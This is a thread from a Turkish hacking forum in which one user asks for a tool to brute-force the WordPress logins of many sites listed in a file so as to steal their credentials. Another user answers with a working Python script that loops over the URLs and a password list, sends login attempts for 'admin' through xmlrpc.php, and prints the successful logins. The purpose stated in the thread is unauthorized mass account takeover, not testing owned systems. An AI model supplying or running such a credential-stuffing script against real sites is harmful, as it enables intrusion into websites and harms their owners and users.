Sızma Testleri En sağlam wordpress bruteforcer programı nedir?

FrezzY*

Katılımcı Üye
3 May 2013
781
8
Uzay
Ne yapmak istediğine göre değişir genel olarak wpscan iyi yeri gelir OpenBullet bile kullanabilirsin biraz daha detay verirsen spesifik olarak yardım edebiliriz
 

SiberAslan

Üye
24 May 2024
182
90
Ne yapmak istediğine göre değişir genel olarak wpscan iyi yeri gelir OpenBullet bile kullanabilirsin biraz daha detay verirsen spesifik olarak yardım edebiliriz
Hocam atıyorum elimde site.txt adlı bir dosya var ve bir sürü sitenin wp-login kısımları var bunlardaki user pass verisine saldırıp bilgileri almak istiyorum.. sık kullanılan user ve pass verilerininde bir txt dosyasında olduğunu varsayalım bütün sitelere brute force aticak bir yazılım nedir diyorum..
 

FrezzY*

Katılımcı Üye
3 May 2013
781
8
Uzay
Python:
import requests

def bruteforce_wordpress(url, username, password):
    api_url = url + "/xmlrpc.php"
    data = """
    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
      <methodName>wp.getUsersBlogs</methodName>
      <params>
        <param><value><string>{username}</string></value></param>
        <param><value><string>{password}</string></value></param>
      </params>
    </methodCall>
    """.format(username=username, password=password)

    response = requests.post(api_url, data=data)
    
    if "<name>isAdmin</name><value>1</value>" in response.text:
        print(f"[+] Başarılı giriş: {url} | Kullanıcı adı: {username} | Parola: {password}")
    else:
        print(f"[-] Giriş başarısız: {url} | Kullanıcı adı: {username} | Parola: {password}")

with open("url.txt", "r") as url_file:
    urls = url_file.read().splitlines()

with open("pass.txt", "r") as pass_file:
    passwords = pass_file.read().splitlines()

for url in urls:
    for password in passwords:
        bruteforce_wordpress(url, "admin", password)  # Varsayılan kullanıcı adı: admin

genel olarak şöyle bi kod var buda xmlrpc açık ise çalışıyor

alternatif olarak şöyle bişey var sadece wordpress değil bi çok CMS için genel zafiyet tarama toolu ayrıca içinde wordpress için bahsettiğin işlemi yapabileceğin modül de var.

 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.